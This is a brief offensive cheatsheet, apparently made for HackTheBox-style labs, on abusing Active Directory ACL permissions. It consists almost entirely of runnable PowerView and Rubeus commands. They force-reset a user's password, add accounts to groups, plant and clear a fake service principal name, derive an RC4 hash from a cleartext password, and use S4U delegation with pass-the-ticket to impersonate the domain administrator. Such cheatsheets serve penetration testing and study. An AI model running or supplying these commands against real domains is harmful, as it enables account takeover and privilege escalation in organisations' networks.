Abuse some ACL
Just another cheatsheet
ForceChangePassword
Import .\Power-View.ps1
Set-DomainUserPassword -Domain painters.htb -Identity blake -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose
GenericWrite
Add user to group
$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred -Verbose
Add fake SPN
Set-DomainObject -Credential $Cred -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
Remove SPN
Set-DomainObject -Credential $Cred -Identity adunn -Clear serviceprincipalname -Verbose
AllowedToDelegate

Check msds bằng Powerview
Get-NetUser -TrustedToAuth
Dump RC4 từ cleartext password
Rubeus.exe hash /domain:"DC.painters.htb" /user:"blake" /password:"Password123!"
Pass the ticket
Rubeus.exe s4u /nowrap /msdsspn:"cifs/DC.painters.htb" /impersonateuser:"administrator" /domain:"painters.htb" /user:"blake" /rc4:"2B576ACBE6BCFDA7294D6BD18041B8FE" /ptt
Last updated